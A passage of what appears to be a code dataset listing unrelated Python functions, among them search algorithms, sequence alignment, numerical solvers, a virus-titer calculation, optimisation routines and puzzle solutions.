them\r\n # and returns the move with the best score \r\n #print state.actions()\r\n heuristicInd = 0\r\n sorts = sort_fn[heuristicInd]\r\n sortedact, heuristicInd = sorts(state)\r\n abmove = argmax(sortedact,\r\n lambda a: min_value(state.result(a),\r\n -infinity, infinity, 0, heuristicInd))\r\n\r\n print 'problem,', problemno[0], ', total tree depth,', totaldepth[0]\r\n for i in range(1, len(visited)):\r\n if len(pruned) < i:\r\n pruned[i] = 0\r\n print i, \",\", len(visited[i]), \",\", pruned[i]\r\n \r\n return abmove", "def _hs_reducible_stages(self,tol=1.e-13):\n m=len(self)\n mindiff=10.\n for i in range(m):\n for j in range(i+1,m):\n dif = np.max(np.abs(self.A[i,:]-self.A[j,:]))\n if dif<tol: return True,[i,j]\n mindiff=min(mindiff,dif)\n return False, mindiff", "def hwt(data):\n sz = len(data)\n i = 0\n res1 = []\n res2 = []\n while i < sz:\n s0 = data[i]\n s1 = data[i+1]\n res1.append((s0+s1)/2.)\n res2.append((s0-s1)/2.)\n i += 2\n return (res1,res2)", "def mbieLoop (self) :\n self.iterCnt = 0\n while self.iterCnt < 5000:\n s = self.mdp.s0\n for h in range(self.H) :\n self.QUpper = QBoundsSolver(self.mdp, self.PHat, self.QUpper, self.Ntotal, 0.1, True, self.stop)\n a = np.argmax(self.QUpper[s])\n s_, self.R[s,a] = self.mdp.step(s, a)\n self.updateVisitStatistics(s, a, s_)\n s = s_\n\n if self.iterCnt % 10 == 0: \n print(self.iterCnt)\n print(self.QUpper)\n\n self.iterCnt += 1", "def needleman_wunsch1(x,y,lodict=None,gop=-2.5, gep=-1.75, local=False):\n n,m = len(x),len(y)\n dp = np.zeros((n+1,m+1))\n pointers = np.zeros((n+1,m+1),np.int32)\n for i in range(1,n+1):\n dp[i,0] = dp[i-1,0]+(gep if i>1 else gop)\n pointers[i,0]=1\n for j in range(1,m+1):\n dp[0,j] = dp[0,j-1]+(gep if j>1 else gop)\n pointers[0,j]=2\n for i in range(1,n+1):\n for j in range(1,m+1):\n if not lodict:\n if x[i-1] == y[j-1]:\n match = dp[i-1,j-1]+1\n else:\n match = dp[i-1,j-1]-1\n else:\n match = dp[i-1,j-1]+lodict[x[i-1],y[j-1]]\n insert = dp[i-1,j]+(gep if pointers[i-1,j]==1 else gop)\n delet = dp[i,j-1]+(gep if pointers[i,j-1]==2 else gop)\n max_score = max([match,insert,delet])\n dp[i,j] = max_score\n pointers[i,j] = [match,insert,delet].index(max_score)\n alg = []\n i,j = n,m\n while(i>0 or j>0):\n pt = pointers[i,j]\n if pt==0:\n i-=1\n j-=1\n alg = [[x[i],y[j]]]+alg\n if pt==1:\n i-=1\n alg = [[x[i],'-']]+alg\n if pt==2:\n j-=1\n alg = [['-',y[j]]]+alg\n return dp[-1,-1], alg", "def entropy(self):\n\n \"\"\"Gets the first neighbours, which are the first 2*r+1 cells.\"\"\"\n current_neighbours = []\n amount = [0] * self.k ** (2 * self.r + 1)\n for i in range(2 * self.r + 1):\n current_neighbours.append(self.config[self.t, i % self.width])\n\n \"\"\"Calculates the rule and adds one to it's amount. It then removes the\n leftmost cell and adds a cell to the right.\"\"\"\n for i in range(len(self.config[self.t]) - 1):\n rule = 0\n for j in range(len(current_neighbours)):\n rule += int(current_neighbours[j] *\n self.k ** ((2 * self.r + 1) - j - 1))\n amount[len(amount) - 1 - rule] += 1\n current_neighbours.pop(0)\n current_neighbours.append(\n self.config[self.t, (2 * self.r + 1 + i) % self.width])\n\n \"\"\"Calculates the rule for the last neighbourhood.\"\"\"\n rule = 0\n for j in range(len(current_neighbours)):\n rule += int(current_neighbours[j] *\n self.k ** ((2 * self.r + 1) - j - 1))\n amount[len(amount)-1 - rule] += 1\n\n \"\"\"Calculates the Shannon entropy and the the average entropy so far.\"\"\"\n shannon = 0\n for i in range(len(amount)):\n if(amount[i] != 0):\n probability = amount[i] / self.width\n shannon -= probability * np.log2(probability)\n self.average_entropy = (self.average_entropy *\n self.t + shannon) / (self.t + 1)", "def Titer(infectedwells, volume, dilution):\n rows = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H'] # row labels in order\n reverserows = [row for row in rows]\n reverserows.reverse()\n nreplicates = len(infectedwells)\n if nreplicates < 2:\n raise ValueError(\"This implementation of the Reed-Muench formula requires at least two replicates. Only %d are provided.\" % nreplicates)\n counts = dict([(r, 0) for r in rows]) # counts of infected wells at each dilution\n for replicatewells in infectedwells:\n for well in replicatewells:\n if well not in rows:\n raise ValueError(\"One of the rows is specified as %s, which is not a valid row.\" % well)\n counts[well] += 1\n infected = {} # cumulative totals of infected wells going up plate\n uninfected = {} # cumulative totals of uninfected wells going down plate\n n = 0\n for row in rows:\n uninfected[row] = n + nreplicates - counts[row]\n n = uninfected[row]\n n = 0\n for row in reverserows:\n infected[row] = n + counts[row]\n n = infected[row]\n percentinfected = {} # cumulative percent infected\n for row in rows:\n percentinfected[row] = 100.0 * infected[row] / (infected[row] + uninfected[row])\n for irow in range(len(rows)):\n if percentinfected[rows[irow]] < 50:\n if irow == 0:\n raise ValueError(\"Even the first dilution has < 50% infected.\")\n else:\n rowabove50 = rows[irow - 1]\n break\n else:\n raise ValueError(\"No dilutions have < 50% infected.\")\n percentrowabove50 = percentinfected[rowabove50]\n if rowabove50 != rows[-1]:\n percentrowbelow50 = percentinfected[rows[rows.index(rowabove50) + 1]]\n else:\n percentrowbelow50 = 0\n index = (percentrowabove50 - 50.0) / (percentrowabove50 - percentrowbelow50)\n startdilution = rows.index(rowabove50)\n titer = dilution**(startdilution + index) / volume\n return titer", "def hillClimbingSearch_FC(problem, maxTrials, userInteraction, beQuiet):\n\n\n currentState = problem.state\n if not beQuiet:\n problem.visualize(currentState)\n steps = 0\n\n # for visualization\n problem.hVals.append(problem.getObjValue(currentState))\n \n while True:\n currentObjVal = problem.getObjValue(currentState)\n if problem.isGlobalOptimum(currentState):\n return steps, currentState\n trials = 0\n betterState = None\n while trials < maxTrials:\n neighbour = problem.getRandomNeighbour(currentState)\n nObjVal = problem.getObjValue(neighbour)\n if problem.isBetter(nObjVal, currentObjVal):\n betterState = neighbour\n break\n trials+=1\n if betterState: \n # jump to neighbour better than current state\n currentState = betterState\n \n # for visualization later on\n problem.hVals.append(problem.getObjValue(currentState))\n \n steps+=1\n if not beQuiet:\n if userInteraction:\n input(\"Press enter to continue \")\n problem.visualize(currentState)\n else:\n print(f\"{maxTrials} trials for random neighbours exhausted. No better neighbour found.\")\n return steps, currentState", "def advance(self):\n\n f, n, rtol, atol, neq = \\\n self.f, self.n, self.rtol, self.atol, self.neq\n u_n, t_n, t_next = self.u[n], self.t[n], self.t[n+1]\n dt = t_next - t_n\n\n first_step = dt # try one big step to next desired level\n\n def middle(x,y,z): # Auxilary function\n return sorted([x,y,z])[1]\n\n # Extract coefficients from Butcher-tableau\n table = self._butcher_tableau\n k_len = table.shape[1] - 1 # number of internal stages\n\n # coefficients for internal stages\n factors_u = np.asarray(table[:k_len, 1:])\n # coefficients for t\n factors_t = table[:k_len, 0]\n # coefficients for u_new\n factors_u_new = table[k_len, 1:]\n\n # coefficients for local error between 2 levels\n factors_error = table[k_len+1, 1:] - factors_u_new\n\n u_intermediate = [u_n,]\n t_intermediate = [t_n,]\n u, t, h = u_n, t_n, first_step # initial values\n k = np.zeros((k_len, self.neq), self.dtype) # intern stages\n\n if self.verbose > 0:\n print 'advance solution in [%s, %s], h=%g' % (t_n, t_next, h)\n\n # Loop until next time point is reached\n while (abs(t - t_n) < abs(t_next - t_n)):\n u, t = u_intermediate[-1], t_intermediate[-1]\n\n # Internal steps\n k[:, :] = 0. # initialization for next step\n for m in range(k_len):\n k_factors = (np.dot(factors_u, k))[m]\n #print u, u+h*k_factors, f(u+h*k_factor, 0.5), self.dtype\n k[m] = f(u+h*k_factors, t+h*factors_t[m])\n u_new = u + h*(np.dot(factors_u_new, k))\n\n self.info['rejected'] += 1 # reduced below if accepted\n if self.verbose > 0:\n print ' u(t=%g)=%g: ' % (t+h, u_new),\n\n # local error between 2 levels\n error = h*np.abs(np.dot(factors_error, k))\n # Acceptable error tolerance\n tol = rtol*np.abs(u_new) + atol\n\n accurate = (error <= tol).all()\n\n if accurate or h <= self.min_step or h >= self.max_step:\n # Accurate enough,\n # or the step size exceeds valid range,\n # must accept this solution\n u_intermediate.append(u_new)\n t_intermediate.append(t+h)\n if not self.disk_storage:\n self.u_all.append(u_new)\n self.t_all.append(t+h)\n self.info['rejected'] -= 1\n\n if self.verbose > 0:\n print 'accepted, ',\n else:\n if self.verbose > 0:\n print 'rejected, ',\n\n if self.verbose > 0:\n print 'err=%s, ' % str(error),\n if hasattr(self, 'u_exact') and callable(self.u_exact):\n print 'exact-err=%s, ' % \\\n (np.asarray(self.u_exact(t+h))-u_new),\n if h <= self.min_step:\n print 'h=min_step!! ',\n\n\n # Replace 0 values by 1e-16 since we will divide by error\n error = np.asarray([(1e-16 if x == 0. else x) \\\n for x in error])\n\n # Normarized error rate\n rms = error/tol\n rms_norm = np.sqrt(np.sum(rms*rms)/self.neq)\n\n order = float(self._method_order[0])\n # factor to adjust the size of next step\n # Formula is from <Numerical Methods for Engineers,\n # Chappra & Cannle>\n s = .8 *((1./rms_norm)**(1/order))\n # scalar should be in range(0.1, 4.)\n # for better accuracy and smoothness\n s = middle(s, 0.1, 4.0)\n h *= s\n\n # step size should be in range [min_step, max_step]\n h = middle(h, self.min_step, self.max_step)\n # adjust h to fit the last step\n h = min(h, t_next - t_intermediate[-1])\n\n if self.verbose > 0:\n print 'new h=%g' % h\n\n if h == 0:\n break\n\n return u_new", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def gem_solve(A, b):\r\n\tstart = time()\r\n\tn = len(A)\r\n\tU = [[0.0 for k in range(n)] for k in range(n)]\r\n\tfor k in range(n):\r\n\t\tfor i in range(k+1,n):\r\n\t\t\tA[i][k] = A[i][k]/A[k][k]\r\n\t\t\tb[i] = b[i] - A[i][k]*b[k]\r\n\t\tfor j in range(k+1,n):\r\n\t\t\tfor i in range(k+1, n):\r\n\t\t\t\tA[i][j] = A[i][j]-A[i][k]*A[k][j]\r\n\t\t\t\t\r\n\tfor i in range(n):\r\n\t\tfor j in range(n):\r\n\t\t\tif i>j:\r\n\t\t\t\tU[i][j] = 0\r\n\t\t\telse:\r\n\t\t\t\tU[i][j] = A[i][j]\r\n\t\r\n\tx, place = backward(U, b)\r\n\tend = time()\r\n\treturn x, (end-start)", "def breath_analyze(self, offset=0, th=10):\n # breath part\n breath_gd = np.gradient(gf(self.breath_list, 10))\n breath_gd[breath_gd > 0] = 1\n breath_gd[breath_gd < 0] = 0\n breath_pulse = breath_gd[:-1]-np.roll(breath_gd, -1)[:-1]\n breath_in = argrelextrema(breath_pulse, np.less, order=10)[0]#+offset\n breath_out = argrelextrema(breath_pulse, np.greater, order=10)[0]#+offset\n self.breath = np.sort(np.hstack([breath_in, breath_out, len(self.breath_list)-1]))\n \n if self.breath[0] == breath_in[0]:\n self.btype = 'in'\n else:\n self.btype = 'out' \n\n b_in = []\n b_out = []\n delidx = []\n\n if len(self.breath) != 0: \n for i, j in zip(self.breath[:-1], self.breath[1:]):\n breath_diff = abs(self.breath_list[j]-self.breath_list[i])\n if abs(breath_diff) > 3000: # really breath in/out\n if abs(breath_diff) < 30000: # not deep breath\n if breath_diff > 0: # breath out\n print('breath out from frame '+str(i)+' to frame '+str(j)\n +' <== breath not deep enough')\n b_out.append(j-i)\n self.ngframe.append(i)\n else: # breath in\n print('breath in from frame '+str(i)+' to frame '+str(j)\n +' <== breath not deep enough')\n b_in.append(j-i)\n else: \n if breath_diff > 0: # breath out\n print('breath out from frame '+str(i)+' to frame '+str(j))\n b_out.append(j-i)\n else: # breath in\n print('breath in from frame '+str(i)+' to frame '+str(j))\n b_in.append(j-i)\n else:\n delidx.append(np.argwhere(self.breath==j)[0][0])\n self.breath = np.delete(self.breath, np.array(delidx))\n\n print('\\naverage breath out freq is: '+str(np.round(30./np.mean(b_out), 2))+' Hz')\n print('\\naverage breath in freq is: '+str(np.round(30./np.mean(b_in), 2))+' Hz')\n else:\n raise ImportError('Doing too fast !! please redo again !!')", "def calc_heuristic(self, state):\n h = 0\n board = state.board.array\n\n for i in range(self._n):\n for j in range(self._n):\n\n if board[i][j] != space_rep:\n tile_as_number = board[i][j]\n correct_x = (tile_as_number - 1) // self._n\n correct_y = (tile_as_number - 1) % self._n\n else:\n continue\n h += calc_diffs(i, j, correct_x, correct_y)\n return h", "def hill_climbing(problem):\n\n current = State(problem.initial_state)\n print(current.get_value())\n while current.get_value() != 0:\n neighbour = current.generate_neighbour()\n print(neighbour.board)\n print(neighbour.get_value())\n if neighbour.get_value() >= current.get_value():\n return current.board\n current = neighbour", "def uniformCostSearch(problem):\n \"*** YOUR CODE HERE ***\"\n path_to_point = {}\n cost_to_point = {}\n\n # Get the start node\n start_node = problem.getStartState()\n fringe_node = [start_node]\n path_to_point[start_node] = []\n cost_to_point[start_node] = problem.getCostOfActions(path_to_point[start_node])\n\n goal_found = False\n\n while(not goal_found):\n #for i in range(100): \n nodes_to_expand = set()\n # get max value node in the fringe node\n min_val = float(\"inf\")\n for one_node in fringe_node:\n # Compute the cost to reach a node\n if cost_to_point[one_node] < min_val:\n min_val = cost_to_point[one_node]\n \n for one_node in fringe_node:\n # Compute the cost to reach a node\n if cost_to_point[one_node] == min_val:\n nodes_to_expand.add(one_node)\n fringe_node.remove(one_node)\n\n # Expand the fringe node \n for one_node in nodes_to_expand:\n path_to_parent = path_to_point[one_node]\n for nxt_node in problem.getSuccessors(one_node):\n pos = nxt_node[0]\n mv = nxt_node[1]\n # check if point already present in path to point\n prev_cost = float(\"inf\")\n if pos in cost_to_point:\n prev_cost = cost_to_point[pos]\n new_path = path_to_parent + [mv]\n if prev_cost > problem.getCostOfActions(new_path):\n path_to_point[pos] = new_path\n cost_to_point[pos] = problem.getCostOfActions(new_path)\n fringe_node.append(pos)\n\n # Check if destination is reached in the fringe node\n for one_node in fringe_node:\n if problem.isGoalState(one_node):\n final_node = one_node\n goal_found = True\n break\n \n #print(len(fringe_node))\n print(final_node)\n print(path_to_point[final_node])\n return path_to_point[final_node] \n\n util.raiseNotDefined()", "def brute_force(L):\n\n max_diff = -float(\"inf\")\n length = len(L)\n for i in range(length - 1):\n start = L[i]\n for j in range(i + 1, length):\n end = L[j]\n diff = end - start\n max_diff = max(max_diff, diff)\n return max_diff", "def solveProblem048():\n # Trivial to brute force with modern hardware.\n sd = 0\n for i in range(1,1000+1):\n sd += i**i\n s = str(sd)\n s = s[-10:]\n print(s)", "def fn(lo, hi):\n if lo == hi: return piles[lo]\n return max(piles[lo] - fn(lo+1, hi), piles[hi] - fn(lo, hi-1))", "def bfgs_method(x0, eps=1e-6, H0=np.eye(18),c1=1e-4):\n k = 0 # initialize num of outer iterations.\n inner_k = 0 # initialize inner k iteration.\n old_xk = None\n alpha_original = 1\n alpha = np.copy(alpha_original)\n xk = x0 # intitialize x.\n Hk = H0 # initialize H, positive definite matrix.\n I = np.eye(len(x0)) # idenitity matrix of 2 by 2.\n\n alpha_vec = []\n f_vec = []\n grad_vec = []\n inner_k = []\n conv_c = []\n\n while np.linalg.norm(rosen_der(xk)) > eps:\n pk = -Hk @ rosen_der(xk)\n\n xk_next = xk + alpha * pk\n ink = 0\n print(xk)\n while rosen(xk_next) > rosen(xk) + c1 * alpha * (pk.T @ rosen_der(xk)):\n \"\"\" find a step size that will satisfy Armijo-Goldstein inequality. Modify alpha. \"\"\"\n alpha = 0.1* alpha\n xk_next = xk + alpha * pk\n ink += 1\n\n inner_k.append(abs(int(ink)))\n\n xk_next = xk + alpha * pk\n\n sk = xk_next - xk\n\n yk = rosen_der(xk_next) - rosen_der(xk)\n\n rho = 1 / (yk.T @ sk)\n\n Hk = np.copy((I - rho * sk @ yk.T) @ Hk @ (I - rho * yk @ sk.T) + rho * sk @ sk.T)\n\n old_xk = np.copy(xk)\n xk = np.copy(xk_next)\n\n alpha_vec.append(alpha)\n f_vec.append(rosen(xk))\n grad_vec.append(np.linalg.norm(rosen_der(xk)))\n alpha = np.copy(alpha_original)\n print(f_vec[-1])\n\n k += 1\n\n return xk, k, inner_k, alpha_vec, f_vec, grad_vec", "def drecurrance(cache, a, b, i, j):\n if i == j and j == 0:\n cache[i][j] = 0\n elif i == 0:\n cache[i][j] = j\n elif j == 0:\n cache[i][j] = i\n elif a[i-1] == b[j-1]:\n cache[i][j] = cache[i-1][j-1]\n else:\n cache[i][j] = 1 + min(cache[i-1][j], cache[i][j-1], cache[i-1][j-1])", "def dfs(x, p, step):\n disc[x] = low[x] = step\n for xx in graph.get(x, []): \n if disc[xx] == inf: \n step += 1\n dfs(xx, x, step)\n low[x] = min(low[x], low[xx])\n if low[xx] > disc[x]: ans.append([x, xx]) # bridge\n elif xx != p: low[x] = min(low[x], disc[xx])", "def safeJourney(Alist,s,d):\n #Initialize dictionaries\n dinit = 10**6\n Edict = {} #Explored nodes\n Udict = {} #Unexplored nodes\n path = [[] for l in Alist]\n\n Alen = len(Alist) #length of Alist\n dinits = [dinit]*Alen #list of airport indexes\n Udict = dict(zip(list(range(Alen)),dinits)) #zip into dictionary\n Udict[s] = 0\n path[s] = [s]\n \n #Main search\n while len(Udict)>0:\n #Find node with min d in Udict and move to Edict\n dmin = dinit\n for n,w in Udict.items():\n if w<dmin:\n dmin=w\n nmin=n\n Edict[nmin] = Udict.pop(nmin)\n print(\"moved node\", nmin)\n\n #Update provisional distances for unexplored neighbors of nmin\n \n #for n,w in G.adj[nmin].items():\n for item in Alist[nmin]: #nminth element is a list of two element tuples (node, weight)\n n = item[0] #first elt of tuple is node/neighbour\n w = item[1] #2nd elt is density/weigh\n #for n,w in etc_______________________-\n \n if n in Edict:\n pass\n elif n in Udict:\n #dcomp = dmin + w\n dcomp = max(w,dmin) #take largest value to record most dangerous segment\n if dcomp<Udict[n]:\n print(Udict)\n Udict[n]=dcomp\n path[n] = path[nmin] + [n]\n #path[n].extend(path[nmin])\n #path[n] = path[nmin]\n \n #path[n].append(n) #n not nmin\n print(path)\n # else:\n #dcomp = dmin + w\n # dcomp = max(w,dmin)\n # Udict[n] = dcomp\n #path[n].extend(path[nmin])\n #path[n].append(nmin) \n \n if nmin == d: #if current node is destination\n return path[d],Edict[d]\n return [] #no path", "def solve(problem):\n\n # *** YOUR CODE HERE ***\n\n # The core of Iterative Deepening Search are iterations of Depth Limited\n # Search with given increasing depth.\n\n # A recursive version of Depth Limited Search\n def depth_limited_search(problem, limit):\n \"\"\"\n Return a list of nodes we traversed (or None).\n :param problem: the starting set up.\n :param limit: a given numeric depth limit.\n :return: a list of nodes.\n \"\"\"\n\n # in this case, we simply use a list to keep track of nodes we\n # traversed, instead of the data structure, Stack.\n path = list()\n visited = set() # as before, to prevent duplicated nodes\n root = problem.get_initial_state()\n\n def rec_dls(state, action, depth):\n\n visited.add(state)\n\n # if it is a goal\n if problem.goal_test(state):\n path.append((state, action))\n return path\n\n # or if it reaches a certain depth, but not a goal\n elif depth == 0:\n visited.remove(state)\n return None\n\n else:\n path.append([state, action])\n for successor, action, cost in problem.get_successors(state):\n if successor not in visited:\n # recursively expands the deepest node\n res = rec_dls(successor, action, depth-1)\n if res is not None:\n return res\n path.pop()\n visited.remove(state)\n\n # \"Stared From the Bottom\" (root)\n result = rec_dls(root, 'None', limit)\n # return the path if the we DID have achieved something\n if result is not None:\n return path\n\n import sys\n for depth in range(sys.maxsize): # depth from 0 to infinity\n print(\"Lower-bound of the optimal cost is {}\".format(depth))\n res2 = depth_limited_search(problem, depth)\n if res2 is not None:\n action_list = list()\n for move in res2:\n action_list.append(move[1]) # recall index 0 is the parent\n # do not forget a None returned in iteration 0 (with depth 0)\n action_list.remove('None')\n return action_list", "def test_hmaps(self):\n #Merging and adding, with commutativity, without collision\n hll1 = HyperLogLog(250)\n hll1.extend(self.data)\n hll2 = HyperLogLog(250)\n hll2.extend(self.num_data)\n test_set = set(non_zero_idx_val(hll1.hmap)).union(\n set(non_zero_idx_val(hll2.hmap)))\n hll1_prime = HyperLogLog(250) #merging\n hll1_prime.extend(self.data)\n hll1_prime.merge(hll2)\n assert set(non_zero_idx_val(hll1_prime.hmap)) == test_set\n hll2_prime = HyperLogLog(250) #merging commutativity\n hll2_prime.extend(self.num_data)\n hll2_prime.merge(hll1)\n assert set(non_zero_idx_val(hll2_prime.hmap)) == test_set\n hll3 = hll1 + hll2 #addition\n assert set(non_zero_idx_val(hll3.hmap)) == test_set\n hll4 = hll2 + hll1 #addition commutativity\n assert set(non_zero_idx_val(hll4.hmap)) == test_set\n \n #Collision testing\n hll1 = HyperLogLog(250)\n hll1.append(self.colliding_data[0])\n hll2 = HyperLogLog(250)\n hll2.append(self.colliding_data[1])\n hll1_prime = HyperLogLog(250)\n hll1_prime.append(self.colliding_data[0])\n hll1_prime.merge(hll2)\n assert hll1_prime.hmap[0] == 2\n hll2_prime = HyperLogLog(250)\n hll2_prime.append(self.colliding_data[1])\n hll2_prime.merge(hll2)\n assert hll2_prime.hmap[0] == 2\n assert (hll1 + hll2).hmap[0] == 2\n assert (hll2 + hll1).hmap[0] == 2", "def fn(i):\n if i == 0: return 1 # boundary condition \n ans = 0\n for k in range(1, N+1): \n if k not in seen and (k%i == 0 or i%k == 0): \n seen.add(k)\n ans += fn(i-1)\n seen.remove(k)\n return ans", "def solution(n: int = 2000000) -> int:\n\n return sum(takewhile(lambda x: x < n, prime_generator()))", "def customBreadthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n i = 0\n dirList = []\n closed = util.Counter()\n fringe = util.Queue()\n state = problem.getStartState()\n followPac = []\n closed[hash(state)] = 1\n\n for triple in problem.getSuccessors(state):\n fringe.push((triple, dirList.copy()))\n while not fringe.isEmpty():\n i += 1\n state = fringe.pop()\n succ = state[0][0]\n act = state[0][1]\n cost = state[0][2]\n dirList = state[1]\n dirList.append(act)\n \n if problem.isGoalState(succ):\n return dirList\n if problem.isPacman(succ):\n followPac.append(dirList.copy())\n if closed[hash(succ)] == 0:\n closed[hash(succ)] = 1\n for triple in problem.getSuccessors(succ):\n fringe.push((triple, dirList.copy()))\n if not followPac:\n return\n followPac = max(followPac, key=lambda x: len(x))\n last = followPac.pop()\n followPac.append(last)\n followPac.append('place')\n followPac.append(reverse[last])\n return followPac.copy()", "def fn(n, k):\n if n == k: return 1\n if k == 0: return 0\n return ((n-1)*fn(n-1, k) + fn(n-1, k-1)) % 1_000_000_007", "def minimumEffortPath(self, heights: List[List[int]]) -> int:\n m, n = len(heights), len(heights[0])\n\n def diff(i, j, _i, _j):\n return abs(heights[i][j] - heights[_i][_j])\n\n max_diff = 0\n for i in range(m):\n for j in range(n):\n for dx, dy in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n _i, _j = i+dx, j+dy\n if 0<=_i<m and 0<=_j<n:\n max_diff = max(max_diff, diff(i, j, _i, _j))\n\n @lru_cache(None)\n def dfs(i, j, remain, k):\n if i == m-1 and j == n-1:\n return True\n for dx, dy in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n _i, _j = i+dx, j+dy\n if 0<=_i<m and 0<=_j<n:\n bit = 1<<(_i*n + _j)\n if remain&bit and diff(i, j, _i, _j) <= k:\n if dfs(_i, _j, remain^bit, k):\n return True\n return False\n\n def bisearch(s, e, func):\n while s <= e:\n p = s + (e-s)//2\n if func(p):\n e = p-1\n else:\n s = p+1\n return e+1\n\n return bisearch(0, max_diff, lambda k: dfs(0, 0, (1<<(m*n))-1, k))", "def manhattan_heuristic(state):\n man_h = 0\n size = len(state)\n for i in range (size):\n for j in range (size):\n if state[i][j] == 0:\n continue\n else:\n man_h = man_h + abs(i - int(state[i][j]/3)) + abs(j - (state[i][j])%3)\n return man_h", "def q3(array):\n a = array[1]\n b = array[6]\n c = array[11]\n d = array[12]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return array[0], a1, array[2], array[3], array[4], array[5], b1, array[7], array[8], array[9], array[10], c1, d1, \\\n array[\n 13], array[14], array[15]", "def part2(problem_input: Iterable[str]) -> int:\n height_map = [[int(n) for n in s.strip()] for s in problem_input]\n\n def view_north(x: int, y: int) -> int:\n if y == 0:\n return 0\n v = 0\n for yy in range(y - 1, -1, -1):\n v += 1\n if height_map[yy][x] >= height_map[y][x]:\n break\n return v\n\n def view_south(x: int, y: int) -> int:\n if y == len(height_map) - 1:\n return 0\n v = 0\n for yy in range(y + 1, len(height_map)):\n v += 1\n if height_map[yy][x] >= height_map[y][x]:\n break\n return v\n\n def view_west(x: int, y: int) -> int:\n if x == 0:\n return 0\n v = 0\n for xx in range(x - 1, -1, -1):\n v += 1\n if height_map[y][xx] >= height_map[y][x]:\n break\n return v\n\n def view_east(x: int, y: int) -> int:\n if x == len(height_map[0]):\n return 0\n v = 0\n for xx in range(x + 1, len(height_map[0])):\n v += 1\n if height_map[y][xx] >= height_map[y][x]:\n break\n return v\n\n return max(\n view_north(x, y) * view_south(x, y) * view_west(x, y) * view_east(x, y)\n for x in range(len(height_map[0]))\n for y in range(len(height_map))\n )", "def griewank(x):\n nopt = np.size(x)\n # if (nopt == 2) | (nopt == 10):\n xx = x\n if nopt == 2:\n d = 200.0\n else:\n d = 4000.0\n\n u1 = 0.0\n u2 = 1.0\n for j in range(nopt):\n u1 = u1 + xx[j]**2 / d\n u2 = u2 * np.cos(xx[j] / np.sqrt(float(j + 1)))\n\n f = u1 - u2 + 1\n return f", "def fastestWay( a, t, e, x, n ):\n import pdb;pdb.set_trace() \n f1.append( ( e[0] , 1 ) )\n f2.append( ( e[1] , 2 ) )\n for i in xrange(n):\n f11 = f1[i][0]+a[0][i]\n f12 = f2[i][0]+a[1][i]+t[1][i+1]\n f22 = f2[i][0]+a[1][i]\n f21 = f1[i][0]+a[0][i]+t[0][i+1]\n\n f1.append( ( min( f11, f12 ), 1 ) if f11 < f12 else ( min( f11, f12 ), 2 ) )\n f2.append( ( min( f21, f22 ), 2 ) if f22 < f21 else ( min( f22, f21 ), 1 ) )\n\n f1x, f2x = f1[n][0]+x[0], f2[n][0]+x[1] \n return ( min( f1x, f2x ) , f1 ) if f1x < f2x else ( min( f1x, f2x ), f2 )", "def solver2(input_val):\n sum_div = [1] * (input_val + 1)\n for i in range(2, int(input_val ** 0.5) + 1):\n sum_div[i * i] += i\n for k in range(i + 1, input_val // i + 1):\n sum_div[k * i] += k + i\n\n abundants, result = set(), 0\n for n in range(1, input_val + 1):\n if sum_div[n] > n:\n abundants.add(n)\n if not any((n - a in abundants) for a in abundants):\n result += n\n return result", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def hill_climbing(\n search_prob,\n find_max: bool = True,\n max_x: float = math.inf,\n min_x: float = -math.inf,\n max_y: float = math.inf,\n min_y: float = -math.inf,\n visualization: bool = False,\n max_iter: int = 10000,\n) -> SearchProblem:\n current_state = search_prob\n scores = [] # list to store the current score at each iteration\n iterations = 0\n solution_found = False\n visited = set()\n while not solution_found and iterations < max_iter:\n visited.add(current_state)\n iterations += 1\n current_score = current_state.score()\n scores.append(current_score)\n neighbors = 